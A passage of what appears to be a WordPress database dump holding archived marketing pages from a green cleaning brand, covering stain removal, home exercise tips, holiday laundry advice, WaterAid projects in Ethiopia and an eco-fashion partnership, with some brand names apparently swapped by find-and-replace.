use on both whites and colourfast laundry and ideal for tackling the daily grime found on collars and cuffs.\n                                                      </p>\n													  <br/>\n														<h3>What makes it unique?</h3>\n														<p>\n                                                            It\'s a product that we consider rather special. It\'s unique in design with its brush applicator. The liquid  formula flows out of the bottles and into the bristles of the brush. You can use this to really work it into the stain. It\'s even been known to work well for the odd carpet blemish!\n                                                        </p>\n                                                        <div class=\"clear\"></div>\n												    <p>\n                                                            Other branded stain removers need to be dispensed in the washing machine draw or sprayed onto the clothes. With Daily\'s stain remover you can really target those affected areas.\n                                                      </p>\n													  <h3 style=\"color:#d0002d;\">Enzymes Pack the Punch</h3>\n                                                        <p>\n                                                            Daily Stain Remover <span style=\"color:#d0002d;\">uses enzymes</span> - <a href=\"../../articles/biological-cleaning-and-the-enzyme-myth/\">biological ingredients</a>, which means it\'s perfect on grease and protein stains like mud, blood  and sweat. Hmm... does that sound familiar to anyone you know?\n                                                        </p>\n                                                        <p>\n                                                            Plus with Daily you can rest assured that we\'re using our tried and trusted plant based ingredients. Let the power of nature do the cleaning, no need for those nasty chemicals!\n                                                        </p>\n                                                    <p class=\"em2\">\n                                                            If you\'ve tried our <a onclick=\"return t2(\'offsite\', this.href, \'click on bottom product link\');\" href=\"http://www.ecoverdirect.com/products/stain-remover/estainremover200ml.aspx?productid=estainremover200ml\" target=\"_blank\">Daily Stain Remover</a>, we\'d love know your thoughts...\n                                                      </p>\n												  </div>\n												</div>\n                          </div>\n                        </div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </form>\n</body>\n</html>','The Secret to Powerful Stain Removal',' Stain Remover tackles stains like mud, sweat and blood on your whites and colourfast clothes. It\'s liquid formula comes with a handy dispenser.','publish','open','open','','the-secret-to-powerful-stain-removal','','','2017-10-17 08:30:44','2017-10-17 08:30:44','',0,'http://www.dailyjolly.co.uk/the-secret-to-powerful-stain-removal',0,'post','',0),(56,1,'2017-10-17 08:30:44','2017-10-17 08:30:44','<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\">\n<head>\n	\n	<meta name=\"description\" content=\"Frankie, our Feel Good expert, gives tips on how to start your own exercise routine and which muscles to focus on so you can look good on the beach this summer.\"/>\n	<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\n    <link rel=\"canonical\" href=\"http://www.the-splash.co.uk/articles/starting-an-exercise-routine\">\n		<link media=\"screen\" rel=\"stylesheet\" href=\"../../css/all.css\" type=\"text/css\"/>\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"../../css/print.css\" media=\"print\"/>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../css/fancybox.css\" type=\"text/css\"/>\n	<!--<script type=\"text/javascript\" src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js\"></script>-->\n    <script type=\"text/javascript\" src=\"../../ajax/libs/jquery/1.9.1/jquery.min.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/jquery.browser.js\"></script>\n    <script type=\"text/javascript\" src=\"../../js/all.js\"></script>\n	<!--<script type=\"text/javascript\" src=\"/js/jquery.moodular.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.controls.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.effects.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery-ui-1.8.14.custom.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tools.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tooltip.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.imagesloaded.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.masonry.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.inputlimiter.1.2.2.min.js\"></script>\n    <script type=\"text/javascript\" src=\"/js/jquery.vticker.1.4.js\"></script>-->\n	<script type=\"text/javascript\" src=\"../../js/jquery.main.js\"></script>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../js/jquery.tooltip.css\" type=\"text/css\"/>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.mousewheel-3.0.4.pack.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.fancybox-1.3.4.pack.js\"></script>\n	<link rel=\"stylesheet\" type=\"text/css\" href=\"../../js/fancybox/jquery.fancybox-1.3.4.css\" media=\"screen\"/>\n	<!--[if lt IE 7]>\n		\n		\n	<![endif]-->\n	<!--[if lt IE 8]><link rel=\"stylesheet\" type=\"text/css\" href=\"/css/ie.css\" media=\"screen\"><![endif]-->\n   \n  var _gaq = _gaq || [];\n  _gaq.push([\'_setAccount\', \'UA-22968591-1\']);\n  _gaq.push([\'_trackPageview\']);\n  (function() {\n    var ga = document.createElement(\'script\'); ga.type = \'text/javascript\'; ga.async = true;\n    ga.src = (\'https:\' == document.location.protocol ? \'https://ssl/\' : \'http://www/\') + \'.google-analytics.com/ga.js\';\n    var s = document.getElementsByTagName(\'script\')[0]; s.parentNode.insertBefore(ga, s);\n  })();\n</script><title>\n</title></head>\n<body id=\"ctl00_body1\" class=\"articles-section helpful-hints-and-tips-subsection\">\n    <form name=\"aspnetForm\" method=\"post\" action=\"../../articles/starting-an-exercise-routine/\" id=\"aspnetForm\">\n      <div class=\"body\">\n        <div class=\"wrapper\">\n          <div class=\"w1\">\n            <div class=\"w2\">\n              <div class=\"w3\">\n                <div id=\"main\">\n                  <div class=\"box\">\n                    <div class=\"c\">\n                      <div class=\"content\">\n                        \n                        <div id=\"twocolumns\">\n                          <div id=\"content\">\n												<div class=\"twocols\">\n													<div class=\"content\">\n														<h2 class=\"title\">Our advice - Starting an exercise routine</h2>\n														\n                                                        <ol class=\"q-and-a\">\n                                                            <li>\n                                                                <strong>What are the best exercises for getting a beach-ready torso for the summer?</strong><br/>\n                                                                <i>In addition to exercising to achieve a beach-ready torso, it\'s important to get your diet right. We all tend to indulge in comfort food over the winter but naturally we swing a bit more to the healthy stuff in the summer months. Make sure you drink lots of water and eat fresh salad, fruit and lovely vegetables. The staples for a fit torso are sit-ups, push-ups and squats, but don\'t forget the simple things such as walking, even if just locally, is a great way to boost your fitness levels.</i>\n                                                            </li>\n                                                            <li>\n                                                                <strong>How do I tone up my arms? Can you give us your top five exercises?</strong><br/>\n                                                                <i>It\'s not a good idea to go straight into vigorous exercise if you\'ve not done anything for a while, build up the intensity gently. Perhaps start with some resistance work, I like to use resistance bands then tone up the arms with bicep curls and triceps push (like a reverse push up) and lat-pulls.</i>\n                                                            </li>\n                                                            <li>\n                                                                <strong>What advice would you give someone who is just starting out on a new fitness regime?</strong><br/>\n                                                                <i>Don\'t set your expectations too high. Be realistic with the time you can commit and set targets that are achievable. To give yourself five dedicated minutes of working out a day is not a bad place to start, as this will be five minutes more than you did yesterday. I\'m a believer in doing small bits of exercise regularly, even starting out by Cleanercising for some light exercise before moving onto more rigorous exercises.</i>\n                                                            </li>\n                                                            <li>\n                                                                <strong>What are the best exercises to target male problem areas such as the stomach that will help to build good core muscles?</strong><br/>\n                                                                <i>The \'Plank\' is a fantastic exercise; I do this for about two minutes every day. Essentially this is supporting the whole body with just your toes and forearms on the floor. Start with 20 second bursts and increase this as you get more confident and your strength builds up. Obviously the basic sit-up delivers results as does lying on your back and raising your feet six inches in the air and holding for as long as you can. Remember to stretch out your abs when you are done, you can do this by rolling onto your stomach and arching your back. This helps prevent stiffness the next day and helps to promote definition.</i>\n                                                            </li>\n                                                            <li>\n                                                                <strong>What sport offers the best fitness results?</strong><br/>\n                                                                <i>The best sport to achieve great results is always going to be the sport that you enjoy the most. You must enjoy whatever you do, you then will keep  going and therefore achieve results. Select an activity that you look forward to doing as this will keep you motivated and ensure you stick to it. It could be swimming, walking or cycling for instance.</i>\n                                                            </li>\n                                                            <li>\n                                                                <strong>What are the best toning exercises you can do in the home?</strong><br/>\n                                                                <i>I\'m not a believer in spending loads of money on gym membership. I do all my non-skating exercises at home. Sit ups, the plank, push-ups etc. are all so easy to do at home as well as using household items such as Daily washing-up liquid as weights.</i>\n                                                            </li>\n                                                            <li>\n                                                                <strong>What is the quickest way to get fit? Do I need to pull a log up a mountain like Rocky?</strong><br/>\n                                                                <i>There is no quick way! It has to be a lifestyle choice, that\'s why I suggest a small amount of exercise daily so you are most likely going to stick with it. Being realistic is one of the best ways to keep motivated.</i>\n                                                            </li>\n                                                            <li>\n                                                                <strong>Is it best to work different muscle groups in different sessions i.e. shoulders and back and then chest and arms?</strong><br/>\n                                                                <i>This all comes down to individual preference but don\'t forget to work your calves, legs and core. It is easy to incorporate more than one muscle group into one activity and do remember that for muscles to grow and repair themselves, they need rest, so doing bicep curls every single day is not advisable in the long term. It\'s important to be sensible with your approach and not be obsessive about one group or certain muscles; it is overall fitness that\'s the key.</i>\n                                                            </li>\n                                                            <li>\n                                                                <strong>What exercises would you recommend for couples to take part in together?</strong><br/>\n                                                            <i>The more people you can share your exercise programme with the better. Involving others will help keep you motivated and pretty much anything you do as a single person can be done as a couple.</i></li>\n                                                        </ol>\n													</div>\n												</div>\n                          </div>\n                        </div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n                <div id=\"inner-footer\">\n						</div>\n					</div>\n				</div>\n				\n			</div>\n		</div>\n  </div>\n    </form>\n</body>\n</html>','Start your Feel Good exercise routine with us','Frankie, our Feel Good expert, gives tips on how to start your own exercise routine and which muscles to focus on so you can look good on the beach this summer.','publish','open','open','','start-your-feel-good-exercise-routine-with-us','','','2017-10-17 08:52:07','2017-10-17 08:52:07','',0,'http://www.dailyjolly.co.uk/start-your-feel-good-exercise-routine-with-frankie',0,'post','',0),(57,1,'2017-10-17 08:30:44','2017-10-17 08:30:44','\r\n<h2 class=\"title\">Daily\'s cleaner, greener travel tips</h2>\r\nWhether you\'re planning a camping trip here in Blighty or are jetting off to a tropical beach, having some handy laundry tips up your sleeve means you can pack lighter and look fresher all holiday long. And you\'ll have more room for more pressies.\r\n<ol>\r\n 	<li><strong>Plan your wardrobe well</strong> - lighter, wrinkle resistant clothes generally dry faster and shouldn\'t need an iron. Think layers. That way you can get away with just washing the inner layers when they need it.</li>\r\n 	<li><strong>Bring what you need</strong> - pour some of your <a href=\"http://www.ecoverdirect.com/products/delicate-laundry-liquid-500ml/edelicate500ml.aspx?productid=edelicate500ml\" target=\"_blank\" rel=\"noopener\">Daily Delicate laundry detergent</a> into a travel bottle. It\'s gentle on you when handwashing and a little goes a long way. And a length of cord can make a great washing line.</li>\r\n 	<li><strong>Think ahead</strong> - plan your laundry drying times so that you don\'t end up having to wear or pack damp clothes.</li>\r\n 	<li><strong>The creative washing line</strong> - bed frames, towel rails, shower rails, balcony chairs and good old clothes hangers are all great options for hanging things up to dry in hotels. Guy ropes, car door frames and cleverly rigged up tent-to-car lines are good camp options. Check out how much drying space you have before you start washing.</li>\r\n 	<li><strong>Use shower power</strong> - smaller items can get a good wash on the shower floor while you soap up. Just rinse in the sink afterwards.</li>\r\n 	<li><strong>Squeeze, don\'t wring</strong> - after washing and rinsing your clothes, squeeze out the water, rather than wringing. It will help your clothes keep their shape better.</li>\r\n 	<li><strong>Towel dry</strong> - we find the best way to get the most water out and avoid dripping is to roll them in a towel. Simply lay the item on a flat towel. Then roll it up from one end and squeeze the whole thing tightly.</li>\r\n 	<li><strong>Hang \'em up</strong> - leave space between the clothes so they dry faster. If you\'re indoors and you can leave a window open, even better.</li>\r\n 	<li><strong>Not quite dry?</strong> You could leave it hanging for another day, finish it off with an iron if you have one or just wear it anyway and let your body heat dry it.</li>\r\n 	<li><strong>Freshen yourself with Daily</strong> - our <a href=\"http://www.ecoverdirect.com/products/mizu-body-wash-250ml/emizshow250ml.aspx?productid=emizshow250ml\" target=\"_blank\" rel=\"noopener\">Mizu body washes</a> and <a href=\"http://www.ecoverdirect.com/products/mizu-body-lotion---normal-skin/emizlothydrat.aspx?productid=emizlothydrat\" target=\"_blank\" rel=\"noopener\">lotions</a> are made from plant based ingredients, making them kinder to you, your family and nature. The perfect holiday companions!</li>\r\n','Travel Hints and Tips','\'s advice for staying cleaner and greener, on your holidays.','publish','open','open','','travel-hints-and-tips','','','2017-10-17 08:58:00','2017-10-17 08:58:00','',0,'http://www.dailyjolly.co.uk/travel-hints-and-tips-from-ecover',0,'post','',0),(58,1,'2017-10-17 08:30:44','2017-10-17 08:30:44','<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\">\n<head>\n	\n	<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\n    <link rel=\"canonical\" href=\"http://www.the-splash.co.uk/articles/wateraid-ethiopia\">\n		<link media=\"screen\" rel=\"stylesheet\" href=\"../../css/all.css\" type=\"text/css\"/>\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"../../css/print.css\" media=\"print\"/>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../css/fancybox.css\" type=\"text/css\"/>\n	<!--<script type=\"text/javascript\" src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js\"></script>-->\n    <script type=\"text/javascript\" src=\"../../ajax/libs/jquery/1.9.1/jquery.min.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/jquery.browser.js\"></script>\n    <script type=\"text/javascript\" src=\"../../js/all.js\"></script>\n	<!--<script type=\"text/javascript\" src=\"/js/jquery.moodular.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.controls.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.effects.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery-ui-1.8.14.custom.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tools.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tooltip.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.imagesloaded.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.masonry.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.inputlimiter.1.2.2.min.js\"></script>\n    <script type=\"text/javascript\" src=\"/js/jquery.vticker.1.4.js\"></script>-->\n	<script type=\"text/javascript\" src=\"../../js/jquery.main.js\"></script>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../js/jquery.tooltip.css\" type=\"text/css\"/>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.mousewheel-3.0.4.pack.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.fancybox-1.3.4.pack.js\"></script>\n	<link rel=\"stylesheet\" type=\"text/css\" href=\"../../js/fancybox/jquery.fancybox-1.3.4.css\" media=\"screen\"/>\n	<!--[if lt IE 7]>\n		\n		\n	<![endif]-->\n	<!--[if lt IE 8]><link rel=\"stylesheet\" type=\"text/css\" href=\"/css/ie.css\" media=\"screen\"><![endif]-->\n   \n  var _gaq = _gaq || [];\n  _gaq.push([\'_setAccount\', \'UA-22968591-1\']);\n  _gaq.push([\'_trackPageview\']);\n  (function() {\n    var ga = document.createElement(\'script\'); ga.type = \'text/javascript\'; ga.async = true;\n    ga.src = (\'https:\' == document.location.protocol ? \'https://ssl/\' : \'http://www/\') + \'.google-analytics.com/ga.js\';\n    var s = document.getElementsByTagName(\'script\')[0]; s.parentNode.insertBefore(ga, s);\n  })();\n</script><title>\n</title></head>\n<body id=\"ctl00_body1\" class=\"articles-section organisations-we-support-subsection\">\n    <form name=\"aspnetForm\" method=\"post\" action=\"../../articles/wateraid-ethiopia/\" id=\"aspnetForm\">\n      <div class=\"body\">\n        <div class=\"wrapper\">\n          <div class=\"w1\">\n            <div class=\"w2\">\n              <div class=\"w3\">\n                <div id=\"main\">\n                  <div class=\"box\">\n                    <div class=\"c\">\n                      <div class=\"content\">\n                        \n                        <div id=\"twocolumns\">\n                          <div id=\"content\">\n												<div class=\"twocols\">\n													<div class=\"content\">\n														<h2 class=\"title\">An Daily and WaterAid Project</h2>\n														\n														<p>\n                                                            Clean water is and always has been an issue that\'s close to our hearts, so when the opportunity to support <a onclick=\"return t(\'offsite\', this.href);\" href=\"http://www.wateraid.org/uk/\" rel=\"nofollow\" target=\"_blank\">WaterAid</a> projects presented itself, we jumped at the chance to help.\n                                                        </p>\n														<p>\n                                                            A good <a href=\"../../friends/wateraid/\">friend of Daily</a>, WaterAid is a charity that works to defend what it believes is every person\'s basic right - the right to clean water. For over 30 years WaterAid has been helping some of the world\'s poorest communities in 26 countries across Africa, Asia and the Pacific region access clean water, sanitation and hygiene. WaterAid believes in giving communities ownership of projects, using simple, low-cost solutions which are easy for communities to maintain themselves. By educating communities about sanitation and hygiene, the solutions WaterAid puts in place can be sustained for future generations. WaterAid\'s work has saved countless lives, and we\'re delighted to be partnering with them on one of their latest projects. \n                                                        </p>\n														\n														<p>\n                                                            Located in rural Ethiopia, the first project\'s aim was to give 14,750 people access to safe water and sanitation, starting with protecting five springs, constructing eight hand-dug wells with hand-pumps and installing rainwater harvesting systems for both schools and health centres. The project provides improved sanitation through the construction of traditional pit toilets serving 1350 households along with safe waste disposal pits for 1600 households, and gives locals hygiene training and promotion. To ensure the ongoing success of the project, WaterAid will also establish 18 water and sanitation committees, and train water technicians and community health educators.\n                                                        </p>\n														<p>\n                                                            Having worked so closely with WaterAid we know just how precious water is, which is why we don\'t take one drop for granted. For example, both our factories have a living, green, Sedum roof that needs very little water - but if it does get a little parched during the summer months, we use the rainwater we\'ve collected. In our French factory, rainwater is also used to flush the toilets. \n                                                        </p>\n														\n														<p>\n                                                            The materials we use to make our products are so gentle and biodegradable you can even re-use your grey (waste) water on your garden. All we advise is that you give the bucket a couple of days to start the biodegradation process... and then splosh!\n                                                        </p>\n														<p>\n														    So far, the projects in Ethiopia have been a great success. As a result of this work, more people will have access to life-saving clean water and sanitation, and the knowledge needed to stay healthy.\n                                                        </p>\n														<p>\n                                                            You\'re already helping to keep water supplies clean by choosing Daily, but if you\'d like to help in a more hands-on way and donate to the cause, visit <a onclick=\"return t(\'offsite\', this.href);\" href=\"https://www.wateraid.org/uk/donate/ecover?id=UN0000,13/MAD,CshOth,13/MAD/23A&amp;utm_source=PartnerList&amp;utm_medium=email&amp;utm_content=&amp;utm_campaign=Corp\" target=\"_blank\">Daily\'s WaterAid website</a>.\n                                                        </p>\n														\n													</div>\n												</div>\n                          </div>\n                        </div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </form>\n</body>\n</html>','WaterAid Project','','publish','open','open','','wateraid-project','','','2017-10-17 08:52:15','2017-10-17 08:52:15','',0,'http://www.dailyjolly.co.uk/an-ecover-and-wateraid-project',0,'post','',0),(59,1,'2017-10-17 08:30:43','2017-10-17 08:30:43','<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\">\n<head>\n	\n	<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\n    <link rel=\"canonical\" href=\"http://www.the-splash.co.uk/articles/wateraid-transforming-lives\">\n		<link media=\"screen\" rel=\"stylesheet\" href=\"../../css/all.css\" type=\"text/css\"/>\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"../../css/print.css\" media=\"print\"/>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../css/fancybox.css\" type=\"text/css\"/>\n	<!--<script type=\"text/javascript\" src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js\"></script>-->\n    <script type=\"text/javascript\" src=\"../../ajax/libs/jquery/1.9.1/jquery.min.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/jquery.browser.js\"></script>\n    <script type=\"text/javascript\" src=\"../../js/all.js\"></script>\n	<!--<script type=\"text/javascript\" src=\"/js/jquery.moodular.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.controls.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.effects.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery-ui-1.8.14.custom.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tools.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tooltip.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.imagesloaded.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.masonry.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.inputlimiter.1.2.2.min.js\"></script>\n    <script type=\"text/javascript\" src=\"/js/jquery.vticker.1.4.js\"></script>-->\n	<script type=\"text/javascript\" src=\"../../js/jquery.main.js\"></script>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../js/jquery.tooltip.css\" type=\"text/css\"/>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.mousewheel-3.0.4.pack.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.fancybox-1.3.4.pack.js\"></script>\n	<link rel=\"stylesheet\" type=\"text/css\" href=\"../../js/fancybox/jquery.fancybox-1.3.4.css\" media=\"screen\"/>\n	<!--[if lt IE 7]>\n		\n		\n	<![endif]-->\n	<!--[if lt IE 8]><link rel=\"stylesheet\" type=\"text/css\" href=\"/css/ie.css\" media=\"screen\"><![endif]-->\n   \n  var _gaq = _gaq || [];\n  _gaq.push([\'_setAccount\', \'UA-22968591-1\']);\n  _gaq.push([\'_trackPageview\']);\n  (function() {\n    var ga = document.createElement(\'script\'); ga.type = \'text/javascript\'; ga.async = true;\n    ga.src = (\'https:\' == document.location.protocol ? \'https://ssl/\' : \'http://www/\') + \'.google-analytics.com/ga.js\';\n    var s = document.getElementsByTagName(\'script\')[0]; s.parentNode.insertBefore(ga, s);\n  })();\n</script><title>\n</title></head>\n<body id=\"ctl00_body1\" class=\"articles-section organisations-we-support-subsection\">\n    <form name=\"aspnetForm\" method=\"post\" action=\"/\" id=\"aspnetForm\">\n      <div class=\"body\">\n        <div class=\"wrapper\">\n          <div class=\"w1\">\n            <div class=\"w2\">\n              <div class=\"w3\">\n                <div id=\"main\">\n                  <div class=\"box\">\n                    <div class=\"c\">\n                      <div class=\"content\">\n                        \n                        <div id=\"twocolumns\">\n                          <div id=\"content\">\n												<div class=\"twocols\">\n													<div class=\"content\">\n														<h2 class=\"title\">Daily and WaterAid: Transforming Lives</h2>\n														\n														<p>\n                                                            For the past few years, we\'ve been helping WaterAid to bring fresh, clean water to the mountain communities of Tigray, Ethiopia. Together, we\'ve built a new gravity-flow water system which channels mountain spring water down into storage tanks situated below, where it\'s available \'on tap\' to villagers.\n                                                        </p>\n														\n														<p>\n                                                            Eighteen year old Letakiros Hagos from the village of Adiger, Tigray is part of the committee that implemented the project. She told us about the difference a safe, accessible water supply has made.\n                                                        </p>\n														<p>\n                                                            \"In earlier times we had one spring which is one and a half hours walk away but it dries in the dry season,\" Letakiros explained. To collect enough water for the whole family, Letakiros had to make two trips - which added up to six hours walking every day. Unsurprisingly, they were left weary. \"We hated that activity - it was a real hardship,\" she says.\n                                                        </p>\n														<p>\n                                                            Life has changed dramatically since those days. \"We are really happy getting this water. We have got a lot of advantages from it. The children were really suffering due to the lack of water and sometimes they suffered skin diseases because they were not clean, but now we are able to wash them whenever we want.\"\n                                                        </p>\n														\n														<p>\n                                                            Time previously spent walking for water can now be used for much more productive activities. \"I manage my animals,\" she says. \"And I have started growing vegetables. I plant, I cultivate and I have a special market day and sell it. So most of my time I use in vegetable production.\"\n                                                        </p>\n														<p>\n                                                            Letakiros\' family has also benefited. \"My four brothers and sisters attended school, but before the water scheme they were suffering as they had a problem washing their clothes regularly. But now they are clean, they are washing their clothes and they can go to school with full confidence because they are clean.\"\n                                                        </p>\n														<p>\n                                                            \"Really, I feel happy. We have got clean water, we have started using pit latrines and in addition to this, before the scheme we had no experience of growing vegetables so we have started growing them. Somebody has told me that people are starting to name their children after plants!\"\n                                                        </p>\n														<p>\n                                                            We can\'t tell you how proud we are to be helping Letakiros, her family and thousands more like her. If you\'d like to help, <a onclick=\"return t(\'offsite\', this.href);\" href=\"https://www.wateraid.org/uk/donate/ecover?id=UN0000,13/MAD,CshOth,13/MAD/23A&amp;utm_source=PartnerList&amp;utm_medium=email&amp;utm_content=&amp;utm_campaign=Corp\" target=\"_blank\">visit our website and donate what you can today</a>.\n                                                        </p>\n														\n														\n													</div>\n												</div>\n                          </div>\n                        </div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </form>\n</body>\n</html>','WaterAid Transforming Lives','','publish','open','open','','wateraid-transforming-lives','','','2017-10-17 08:30:43','2017-10-17 08:30:43','',0,'http://www.dailyjolly.co.uk/wateraid-transforming-lives',0,'post','',0),(60,1,'2017-10-17 08:30:43','2017-10-17 08:30:43','<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\">\n<head>\n	\n	<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\n    <link rel=\"canonical\" href=\"http://www.the-splash.co.uk/articles/wear-and-care\">\n		<\n	<!--[if lt IE 7]>\n		\n		\n	<![endif]-->\n	<!--[if lt IE 8]><link rel=\"stylesheet\" type=\"text/css\" href=\"/css/ie.css\" media=\"screen\"><![endif]-->\n   \n  var _gaq = _gaq || [];\n  _gaq.push([\'_setAccount\', \'UA-22968591-1\']);\n  _gaq.push([\'_trackPageview\']);\n  (function() {\n    var ga = document.createElement(\'script\'); ga.type = \'text/javascript\'; ga.async = true;\n    ga.src = (\'https:\' == document.location.protocol ? \'https://ssl/\' : \'http://www/\') + \'.google-analytics.com/ga.js\';\n    var s = document.getElementsByTagName(\'script\')[0]; s.parentNode.insertBefore(ga, s);\n  })();\n</script><title>\n</title></head>\n<body id=\"ctl00_body1\" class=\"articles-section helpful-hints-and-tips-subsection\">\n    \n      <div class=\"wrapper\">\n      <div class=\"w1\">\n        <div class=\"w2\">\n          <div class=\"w3\">\n            <div id=\"main\">\n            <div class=\"box\">\n              <div class=\"c\">\n                <div class=\"content\">\n                  \n                  <div id=\"twocolumns\">\n                    <div id=\"content\">\n												<div class=\"twocols\">\n													<div class=\"content\">\n														<h2 class=\"title\">\'Wear and Care\' for your wardrobe</h2>\n														<h3>Daily and Ada Zanditon show it\'s easy to Wear and Care for your fashion</h3>\n                                                        \n                                                        <p>\n                                                            Did you know that on average women spend up to a year of their lives choosing what to wear, but only a matter of seconds choosing the how to care for their clothes?\n                                                        </p>\n                                                        <p>\n                                                            Daily has teamed up with cutting edge eco-fashion designer Ada Zanditon to show that you can wear high end, luxury, timeless fashion and care for your clothes, skin and the world around you all at the same time. Not only is your life made easier but you\'ll have an excuse to feel good about it too! \n                                                        </p>\n                                                        <p>\n                                                            Make Wear and Care the latest addition to your fashion and beauty routine and not only will you know that your beautiful garments and fashion favourites are in good hands, but you can walk with a spring in your step knowing you are doing your bit for the environment too. \n                                                        </p>\n                                                        <p>\n                                                            Ada is one designer whose eco-credentials and fashion style has set her apart from the rest with awards including the Fairtrade Cotton Innovation award from the Fairtrade Foundation and Ethical Fashion Forum, and recognition from the greats of the fashion world. \n                                                        </p>\n                                                        <p>\n                                                            Ada says: \"There is a lot of emphasis on the sourcing and production of clothes and how important it is to choose ethically and sustainably, so choosing to care for them in the same way is really the next logical step. If you choose your laundry products in the same way you choose your clothes, you would be making the world of difference! \n                                                        </p>\n                                                        <p>\n                                                            \"Wear and Care is about loving your favourite clothes for longer and giving yourself a little pat on the back for caring for the world around you at the same time.  Daily does everything as sustainably and ecologically as possible from start to finish, thinking of all the little things that make the difference - so you only have to think about one thing - choosing it.\"\n                                                        </p>\n                                                        <p>\n                                                            Daily has a whole basket of laundry products that not only help to ensure that you can wear your latest fashion purchases or little black dress time and again, but will also help to care for them by remaining kind to the skin and the environment:\n                                                        </p>\n                                                        <ul>\n                                                            <li><strong>Concentrated Laundry Liquid</strong> -  using less to wash your favourite jeans</li>\n                                                            <li><strong>Concentrated Bio and Non-Bio Powders</strong> - developed to perform at 30&deg;C, meaning you can turn down the temperature without turning down performance, plus you\'ll use less energy to keep your clothes clean</li>\n                                                            <li><strong>Fabric Softener</strong> - natural fragrances and plant based ingredients keep your clothes smelling fresh whilst being gentle on soft skin</li>\n                                                            <li><strong>Delicate Laundry Liquid</strong> - perfect for finer fabrics and hand washing your cashmere jumper and nude chiffons</li>\n                                                            <li><strong>Stain Remover</strong> - our mighty stain buster comes to the rescue to banish everything from red wine to make up - your favourites are in safe hands</li>\n                                                        </ul>\n                                                        <p>\n                                                            Emma from Daily UK says: \"We all recycle newspapers, reuse shopping bags and refill empties on a daily basis, and now it\'s easy to Wear and Care with Daily. With a product to care for every garment, you can do the wearing and we do the caring!\"\n                                                        </p>\n                                                        <p>\n                                                            Now it\'s even easier to get hold of Daily\'s laundry range through our new online store. Visit <a href=\"http://www.ecoverdirect.com/\" onclick=\"return t(\'offsite\', this.href);\" target=\"_blank\">www.Dailydirect.com</a> and learn more about Wear and Care for your clothes.\n                                                        </p>\n														\n													</div>\n												</div>\n              \n    